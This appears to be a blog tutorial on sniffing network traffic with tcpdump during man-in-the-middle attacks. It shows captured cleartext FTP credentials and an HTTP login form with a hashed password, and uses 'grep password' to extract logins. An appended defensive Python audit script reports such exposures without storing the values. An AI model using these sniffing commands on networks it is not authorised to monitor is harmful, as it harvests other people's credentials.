35: Man-in-the-Middle Attacks: Advanced Sniffing with tcpdump
Posted on 2012-8-9 00:02:01
List the network interfaces:
  root@Dis9Team:~# tcpdump -D
  1.eth0
  2.usbmon1 (USB bus number 1)
  3.usbmon2 (USB bus number 2)
  4.any (Pseudo-device that captures on all interfaces)
  5.lo
  root@Dis9Team:~#
Sniff on a specific interface and analyze the packets:
  root@Dis9Team:~# tcpdump -i eth0 -c 3 arp
Specify the IP, port and protocol. On 5.5.5.130 I ran: ftp brk.dis9.com. See whether you can find the data now. -A means ASCII.
  root@Dis9Team:~# tcpdump -A -i eth0 tcp and src 5.5.5.130 and port 21
  tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
  listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes
  06:42:52.338012 IP 5.5.5.130.1038 > unassigned.psychz.net.ftp: Flags [S], seq 2684785620, win 64240, options [mss 1460,nop,nop,sackOK], length 0
  E..0.c@...S......G..............p...............
  06:42:53.393140 IP 5.5.5.130.1038 > unassigned.psychz.net.ftp: Flags [.], ack 1305639100, win 64240, length 0
  E..(.d@...S......G..........M.x.P.............
  06:42:54.251161 IP 5.5.5.130.1038 > unassigned.psychz.net.ftp: Flags [.], ack 249, win 63992, length 0
  E..(.e@...S......G..........M.y.P.............
  06:42:59.706404 IP 5.5.5.130.1038 > unassigned.psychz.net.ftp: Flags [P.], seq 0:10, ack 249, win 63992, length 10
  E..2.f@...S......G..........M.y.P....-..USER brk

  06:43:00.822040 IP 5.5.5.130.1038 > unassigned.psychz.net.ftp: Flags [.], ack 279, win 63962, length 0
  E..(.g@...S......G..........M.y.P.............
  06:43:02.765904 IP 5.5.5.130.1038 > unassigned.psychz.net.ftp: Flags [P.], seq 10:23, ack 279, win 63962, length 13
  E..5.h@...S......G..........M.y.P....b..PASS 123456

  06:43:08.968601 IP 5.5.5.130.1038 > unassigned.psychz.net.ftp: Flags [.], ack 299, win 63942, length 0
  E..(.l@...S......G..........M.y.P.............
When sniffing the HTTP port there is a lot of page content, so we can do this: grep password
  root@Dis9Team:~# tcpdump -A -i eth0 tcp and src 5.5.5.130 and port 80 | grep password
  tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
  listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes
  formhash=61b0c24b&referer=http%3A%2F%2Fwww.dis9.com%2F&loginfield=username&username=admin&password=b02b2a939e6e57036426a33be3336ef0&questionid=0&answer=&loginsubmit=%B5%C7%C2%BC


First you need to analyze the page's submission form, for example:


<form><input id="user_password" type="password"/></form>

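Only after playing a thousand tunes does one understand music; only after examining a thousand swords does one recognize a fine blade.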
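
The captures above show FTP and HTTP form logins crossing the wire unencrypted. As an added example (not part of the original post), the following Python function audits saved `tcpdump -A` text output for such exposures and reports only the protocol, field, flow and value length, never the value itself; the function name `audit`, the rule set and the finding fields are assumptions made for this illustration.

```python
import re

# Header of a `tcpdump -A` text record: "HH:MM:SS.us IP src > dst: ..."
HEADER = re.compile(r"^\d{2}:\d{2}:\d{2}\.\d+ IP (\S+) > (\S+): ")
# Cleartext credential carriers seen in the post: FTP commands and a form field.
RULES = [
    ("ftp", "USER", re.compile(r"\bUSER (\S+)")),
    ("ftp", "PASS", re.compile(r"\bPASS (\S+)")),
    ("http-form", "password", re.compile(r"(?:^|[&?])password=([^&\s]+)")),
]
HEX32 = re.compile(r"^[0-9a-fA-F]{32}$")


def audit(lines):
    """Return one finding per cleartext credential; values are never stored."""
    findings, flow = [], None
    for line in lines:
        m = HEADER.match(line)
        if m:
            flow = f"{m.group(1)} > {m.group(2)}"
            continue
        for proto, field, rx in RULES:
            hit = rx.search(line)
            if hit:
                value = hit.group(1)
                findings.append({
                    "proto": proto,
                    "field": field,
                    "flow": flow,  # None when grep dropped the header line
                    "length": len(value),
                    # 32 hex digits, as in the HTTP capture; still sent unencrypted.
                    "hex32": bool(HEX32.match(value)),
                })
    return findings


# Sample lines copied from the captures in the post above.
FTP_SAMPLE = [
    "06:42:59.706404 IP 5.5.5.130.1038 > unassigned.psychz.net.ftp: Flags [P.], seq 0:10, ack 249, win 63992, length 10",
    "E..2.f@...S......G..........M.y.P....-..USER brk",
    "06:43:02.765904 IP 5.5.5.130.1038 > unassigned.psychz.net.ftp: Flags [P.], seq 10:23, ack 279, win 63962, length 13",
    "E..5.h@...S......G..........M.y.P....b..PASS 123456",
]
HTTP_SAMPLE = ["formhash=61b0c24b&loginfield=username&username=admin&password=b02b2a939e6e57036426a33be3336ef0&questionid=0"]

if __name__ == "__main__":
    for finding in audit(FTP_SAMPLE) + audit(HTTP_SAMPLE):
        print(finding)
```

Each finding identifies a service that should be moved to an encrypted transport (SFTP or FTPS in place of FTP, HTTPS for the login form).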
